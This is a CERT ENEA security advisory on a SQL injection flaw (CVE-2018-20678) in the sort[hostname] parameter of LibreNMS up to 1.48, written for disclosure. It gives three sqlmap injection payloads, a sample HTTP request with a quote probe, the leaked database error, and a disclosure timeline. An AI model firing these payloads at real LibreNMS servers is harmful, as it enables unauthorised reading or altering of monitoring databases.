LibreNMS SQL Injection > 1.48 release

Information

Advisory by CERT ENEA
Name: SQL Injection in LibreNMS software
Affected Software: LibreNMS
Affected Versions: up to 1.48
Homepage: http://librenms.org
Vulnerability: SQL Injection
Severity: High
Status: fixed in 1.48 (28.1.2019)
CVE-ID: CVE-2018-20678
CVSS(3): 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Vulnerability description

The sort[hostname] parameter is vulnerable to SQL Injection attacks. The payload ‘ was submited in the affected parameter and database error were returned. Payloads that provide to SQL Injections (found by sqlmap)

Parameter: sort[hostname] (POST)

Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload: current=1&rowCount=50&sort[hostname]=asc,(SELECT (CASE WHEN (7936=7936) THEN 1 ELSE
7936*(SELECT 7936 FROM INFORMATION_SCHEMA.CHARACTER_SETS)
END))&searchPhrase=&id=devices&format=list_detail&searchquery=&os=&version=&hardware=&features=&location=&type=printer&state=&disabled=&ignore=&group=

Type: error-based
Title: MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause
Payload: current=1&rowCount=50&sort[hostname]=asc,(SELECT 4732 FROM(SELECT
COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4732=4732,1))),0x71717a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&searchPhrase=&id=devices&format=list_detail&searchquery
=&os=&version=&hardware=&features=&location=&type=printer&state=&disabled=&ignore=&group=

Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: current=1&rowCount=50&sort[hostname]=asc PROCEDURE
ANALYSE(EXTRACTVALUE(2115,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x52644e63))))),1)#&searchPhrase=&id=devices&format=
list_detail&searchquery=&os=&version=&hardware=&features=&location=&type=printer&state=&disabled=&ignore=&group=

Technical Details

https://librenms.mydomain.ltd/ajax_table.php

For HTTP POST Request:

POST /ajax_table.php HTTP/1.1
Host: librenms.mydomain
Connection: close
Content-Length: 190
Accept: */*
Origin: https://librenms.mydomin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://librenms.mydomain/devices/type=server/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=11b1adbc608591293c38ff52fcc4d74a;
XSRF-TOKEN=eyJpdiI6Im1QVGtSdEhZbzZlZTZYcURUenBMelE9PSIsInZhbHVlIjoiUWFDNlErQnF1akpZTjFPMVFkeVBCUlNSZEQ4RGZFNWVNXC81TG90N1hcL3htS1NlZFBPcUdiVWl5UEVabHlHNTAzS2dDVU
tJN3lRdmVTN3c5cE91bWFDdz09IiwibWFjIjoiYmIwMTk0OTIwZjcwNGVjZDIxNzYyMjBjYzNkZjM2MzcwNDVlNDlkNTE2YmY3M2VjMzJmMDAwZmEwMWZjYjU4ZCJ9;
librenms_session=eyJpdiI6InM0cUxSZVZkaHc3TnFMQ0FpeGVOSnc9PSIsInZhbHVlIjoid0R5UkQ5c2pYRnZJc3NIK3RlNit3RDZjelpjWGl0NjFmbGRJa3k5eGNqQkg3NjR6TzBWNzdxQmJ5SGhtWDNiT3JW
OVA2YjFmcDhTTzJBWldkaU5NYmc9PSIsIm1hYyI6Ijk4ZDJiZjVkNWJmNGZkMTc2MmY3MmNiNGE4YmIwNWRhZWUxNjRhMmMyMjc0MzkyMGY4ODU3ZmYxZTM2Mzk4MGUifQ%3D%3D

current=1&rowCount=50&sort%5Bhostname%5D=asc'&searchPhrase=&id=devices&format=+list_detail&searchquery=&os=&version=&hardware=&features=&location=&type=server&
state=&disabled=&ignore=&group=

HTTP Response:

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 08 Jan 2019 00:16:08 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 822

SQL Error! SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server
version for the right syntax to use near '' LIMIT 0,50' at line 1 (SQL: SELECT DISTINCT(`devices`.`device_id`),`devices`.*,locations.location  FROM `devices`
LEFT JOIN locations ON devices.location_id = locations.id WHERE 1  AND type = server ORDER BY  hostname asc' LIMIT 0,50) (SQL: SELECT DISTINCT
(`devices`.`device_id`),`devices`.*,locations.location  FROM `devices` LEFT JOIN locations ON devices.location_id = locations.id WHERE 1  AND type = server ORDER
BY  hostname asc' LIMIT 0,50)
  /opt/librenms/html/includes/table/devices.inc.php:128
  /opt/librenms/html/ajax_table.php:44
{
    "current": 1,
    "rowCount": 50,
    "rows": [],
    "total": 42
}

Tested at:

====================================
Component | Version
--------- | -------
LibreNMS  | 1.47-18-gd303174
DB Schema | 278
PHP       | 7.2.11
MySQL     | 5.5.60-MariaDB
RRDTool   | 1.4.8
SNMP      | NET-SNMP 5.7.2
====================================

Information

8.1.2019 – first contact
11.1.2019 – technical details sent
11.1.2019 – vendor confirmed vulnerability
11.1.2019 – CVE assigned
28.1.2019 – patch released
1.02.2019 - CVE published

Credits

The issue have been discovered by Dariusz Gońda, CERT ENEA member (https://cert.enea.pl)